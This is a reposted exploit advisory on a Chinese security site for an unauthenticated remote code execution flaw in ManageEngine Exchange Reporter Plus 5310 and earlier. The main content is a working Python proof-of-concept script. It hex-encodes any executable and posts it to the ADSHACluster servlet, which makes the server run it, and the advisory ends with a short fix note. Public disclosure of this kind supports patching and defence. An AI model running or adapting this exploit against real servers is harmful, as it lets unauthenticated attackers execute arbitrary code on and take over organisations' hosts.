首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ManageEngine Exchange Reporter Plus 5310 Remote Code Execution
来源:https://security.szurek.pl 作者:Szurek 发布时间:2018-07-04  
# Exploit Title: ManageEngine Exchange Reporter Plus <= 5310 Unauthenticated RCE
# Date: 28-06-2018
# Software Link: https://www.manageengine.com/products/exchange-reports/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# YouTube: https://www.youtube.com/c/KacperSzurek
# Category: remote
 
1. Description
  
Java servlet `ADSHACluster` executes `bcp.exe` file which can be passed using `BCP_EXE` param.

https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html
  
2. Proof of Concept

```python
import urllib

file_to_execute = "calc.exe"
ip = "192.168.1.105" 

def to_hex(s):
    lst = []
    for ch in s:
        hv = hex(ord(ch)).replace('0x', '')
        if len(hv) == 1:
            hv = '0'+hv
        lst.append(hv)
    
    return reduce(lambda x,y:x+y, lst)

print "ManageEngine Exchange Reporter Plus <= 5310"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek"

params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())})
f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params)
if '{"STATUS":"error"}' in f.read():
	print "OK"
else:
	print "ERROR"
```

3. Solution:
   
Update to version 5311
https://www.manageengine.com/products/exchange-reports/release-notes.html

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Boxoft WAV To MP3 Converter 1.
·GitList 0.6.0 Argument Injecti
·openslp 2.0.0 Double Free
·HID discoveryd command_blink_o
·ntop-ng Authentication Bypass
·HP VAN SDN Controller Root Com
·Delta Industrial Automation CO
·Grundig Smart Inter@ctive 3.0
·Nagios XI 5.2.6-5.4.12 - Chain
·Boxoft WAV to WMA Converter 1.
·FTPShell Client 6.70 (Enterpri
·Tor Browser < 0.3.2.10 - Use A
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved